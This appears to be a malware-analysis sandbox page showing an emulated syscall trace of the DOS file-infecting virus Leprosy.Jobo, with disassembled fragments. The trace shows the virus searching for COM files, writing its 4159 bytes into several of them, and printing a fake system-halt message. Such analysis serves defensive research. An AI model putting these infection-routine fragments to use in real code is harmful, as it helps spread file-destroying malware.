Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Jobo.4159

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:19:33.974187095Z 44 PC: 1380f | Get time 0x1380f: xor dh, dh
0x13811: and dl, 7
0x13814: cmp dx, 6
0x13817: jg 0x1380b
0x13819: push dx
0x1381a: add dx, 0x138
0x1381e: mov si, dx
0x13820: mov dl, byte ptr cs:[si]
0x13823: mov byte ptr [0x103], dl
0x13827: pop dx
0x13828: push dx
0x13829: add dx, 0x14d
0x1382d: mov si, dx
0x1382f: mov dl, byte ptr cs:[si]
0x13832: mov byte ptr [0x100], dl
0x13836: mov ah, 0x2c
0x13838: int 0x21
0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
2018-12-17T22:19:33.976549442Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:33.978110515Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:33.979542989Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:33.981407637Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:33.982838817Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:33.984187375Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:33.985759642Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:33.987241479Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:33.989014283Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:33.990428821Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:33.997903591Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:33.999993305Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.002216752Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.00542221Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.007861073Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.010922233Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.014199925Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.016589601Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.019265571Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.022035633Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.024430944Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.026524413Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.029257134Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.031405896Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.033663483Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.036490375Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.039646927Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.041829512Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.057308667Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.059375252Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.061389312Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.063935921Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.066014143Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.068041935Z 44 PC: 1383a | Get time 0x1383a: xor dh, dh
0x1383c: and dl, 7
0x1383f: cmp dx, 6
0x13842: jg 0x13836
0x13844: pop ax
0x13845: push ax
0x13846: cmp ax, dx
0x13848: je 0x13836
0x1384a: pop ax
0x1384b: push dx
0x1384c: add dx, 0x13f
0x13850: mov si, dx
0x13852: mov dl, byte ptr cs:[si]
0x13855: mov byte ptr [0x104], dl
0x13859: pop dx
0x1385a: add dx, 0x146
0x1385e: mov si, dx
0x13860: mov dl, byte ptr cs:[si]
0x13863: mov byte ptr [0x106], dl
0x13867: mov ah, 0x2c
2018-12-17T22:19:34.071362477Z 44 PC: 1386b | Get time 0x1386b: cmp byte ptr [0x10a], 0
0x13870: je 0x13877
0x13872: cmp dh, 0xf
0x13875: jg 0x13880
0x13877: cmp dl, 0
0x1387a: je 0x1380b
0x1387c: mov byte ptr [0x10a], dl
0x13880: mov byte ptr [0xec0], 0
0x13885: mov byte ptr [0xec1], 4
0x1388a: mov byte ptr [0xeca], 0
0x1388f: mov cx, 0x27
0x13892: mov dx, 0xcd5
0x13895: mov ah, 0x4e
0x13897: int 0x21
0x13899: cmp ax, 0x12
0x1389c: je 0x138a1
0x1389e: call 0x138c3
0x138a1: mov cx, 0x27
0x138a4: mov dx, 0xcdb
0x138a7: mov ah, 0x4e
2018-12-17T22:19:34.073743666Z 78 PC: 13899 | Find first file
2018-12-17T22:19:34.079748841Z 78 PC: 138ab | Find first file
2018-12-17T22:19:34.086274689Z 67 PC: 138e4 | Get or set file attributes
2018-12-17T22:19:34.102689999Z 61 PC: 138ea | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:19:34.109239646Z 63 PC: 138f9 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:19:34.117006761Z 62 PC: 13945 | Close file
2018-12-17T22:19:34.11896041Z 61 PC: 1394e | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:19:34.1265559Z 64 PC: 12a5e | Write file or device (Write 4159 bytes on handle 5)
2018-12-17T22:19:34.13544795Z 87 PC: 13976 | Get or set file date and time
2018-12-17T22:19:34.137253673Z 62 PC: 1397e | Close file
2018-12-17T22:19:34.144961235Z 67 PC: 1398b | Get or set file attributes
2018-12-17T22:19:34.14966311Z 79 PC: 13935 | Find next file
2018-12-17T22:19:34.152891446Z 67 PC: 138e4 | Get or set file attributes
2018-12-17T22:19:34.169687093Z 61 PC: 138ea | Open file (Filename = 'PRINT.COM')
2018-12-17T22:19:34.176151804Z 63 PC: 138f9 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:19:34.183584622Z 87 PC: 13976 | Get or set file date and time
2018-12-17T22:19:34.185555712Z 62 PC: 1397e | Close file
2018-12-17T22:19:34.192520091Z 67 PC: 1398b | Get or set file attributes
2018-12-17T22:19:34.201967496Z 79 PC: 13935 | Find next file
2018-12-17T22:19:34.208494492Z 67 PC: 138e4 | Get or set file attributes
2018-12-17T22:19:34.217874007Z 61 PC: 138ea | Open file (Filename = 'HELLO.COM')
2018-12-17T22:19:34.224577045Z 63 PC: 138f9 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:19:34.230698589Z 62 PC: 13945 | Close file
2018-12-17T22:19:34.232325453Z 61 PC: 1394e | Open file (Filename = 'HELLO.COM')
2018-12-17T22:19:34.240549888Z 64 PC: 12a5e | Write file or device (Write 4159 bytes on handle 5)
2018-12-17T22:19:34.249374384Z 87 PC: 13976 | Get or set file date and time
2018-12-17T22:19:34.250717251Z 62 PC: 1397e | Close file
2018-12-17T22:19:34.258603306Z 67 PC: 1398b | Get or set file attributes
2018-12-17T22:19:34.268115124Z 79 PC: 13935 | Find next file
2018-12-17T22:19:34.27446407Z 67 PC: 138e4 | Get or set file attributes
2018-12-17T22:19:34.28565739Z 61 PC: 138ea | Open file (Filename = 'PHANG.COM')
2018-12-17T22:19:34.292987127Z 63 PC: 138f9 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:19:34.299218887Z 87 PC: 13976 | Get or set file date and time
2018-12-17T22:19:34.301539676Z 62 PC: 1397e | Close file
2018-12-17T22:19:34.309256737Z 67 PC: 1398b | Get or set file attributes
2018-12-17T22:19:34.314223707Z 79 PC: 13935 | Find next file
2018-12-17T22:19:34.318415817Z 67 PC: 138e4 | Get or set file attributes
2018-12-17T22:19:34.330787773Z 61 PC: 138ea | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:19:34.337126604Z 63 PC: 138f9 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:19:34.34410827Z 87 PC: 13976 | Get or set file date and time
2018-12-17T22:19:34.345514928Z 62 PC: 1397e | Close file
2018-12-17T22:19:34.352245694Z 67 PC: 1398b | Get or set file attributes
2018-12-17T22:19:34.357295832Z 79 PC: 13935 | Find next file
2018-12-17T22:19:34.359861918Z 67 PC: 138e4 | Get or set file attributes
2018-12-17T22:19:34.369152908Z 61 PC: 138ea | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:19:34.381633343Z 63 PC: 138f9 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:19:34.386607565Z 62 PC: 13945 | Close file
2018-12-17T22:19:34.38857683Z 61 PC: 1394e | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:19:34.397400367Z 64 PC: 12a5e | Write file or device (Write 4159 bytes on handle 5)
2018-12-17T22:19:34.407431355Z 87 PC: 13976 | Get or set file date and time
2018-12-17T22:19:34.409155458Z 62 PC: 1397e | Close file
2018-12-17T22:19:34.416880179Z 67 PC: 1398b | Get or set file attributes
2018-12-17T22:19:34.421568118Z 79 PC: 13935 | Find next file
2018-12-17T22:19:34.424128795Z 67 PC: 138e4 | Get or set file attributes
2018-12-17T22:19:34.434079287Z 61 PC: 138ea | Open file (Filename = 'PAH.COM')
2018-12-17T22:19:34.440500024Z 63 PC: 138f9 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:19:34.446661044Z 87 PC: 13976 | Get or set file date and time
2018-12-17T22:19:34.448560248Z 62 PC: 1397e | Close file
2018-12-17T22:19:34.457969327Z 67 PC: 1398b | Get or set file attributes
2018-12-17T22:19:34.46250483Z 79 PC: 13935 | Find next file
2018-12-17T22:19:34.465592878Z 67 PC: 138e4 | Get or set file attributes
2018-12-17T22:19:34.475313332Z 61 PC: 138ea | Open file (Filename = 'TEST.COM')
2018-12-17T22:19:34.481822219Z 63 PC: 138f9 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:19:34.48857908Z 87 PC: 13976 | Get or set file date and time
2018-12-17T22:19:34.490372282Z 62 PC: 1397e | Close file
2018-12-17T22:19:34.497503265Z 67 PC: 1398b | Get or set file attributes
2018-12-17T22:19:34.507296981Z 79 PC: 13935 | Find next file
2018-12-17T22:19:34.513436226Z 59 PC: 138ba | Change current directory
2018-12-17T22:19:34.522393434Z 44 PC: 139a0 | Get time 0x139a0: xor dh, dh
0x139a2: and dl, 0x3f
0x139a5: cmp dx, 0x69
0x139a8: jg 0x1399c
0x139aa: mov ah, 9
0x139ac: add dx, dx
0x139ae: add dx, 0x154
0x139b2: mov si, dx
0x139b4: mov dx, word ptr cs:[si]
0x139b7: int 0x21
0x139b9: int 0x20
0x139bb: mov ah, 0xf
0x139bd: int 0x10
0x139bf: xor ah, ah
0x139c1: int 0x10
0x139c3: mov ah, 1
0x139c5: mov cx, 0x2607
0x139c8: int 0x10
0x139ca: mov ax, 0xb800
0x139cd: mov es, ax
2018-12-17T22:19:34.524619712Z 9 PC: 139b9 | Display string (String= 'Cannot load COMMAND, system halted ')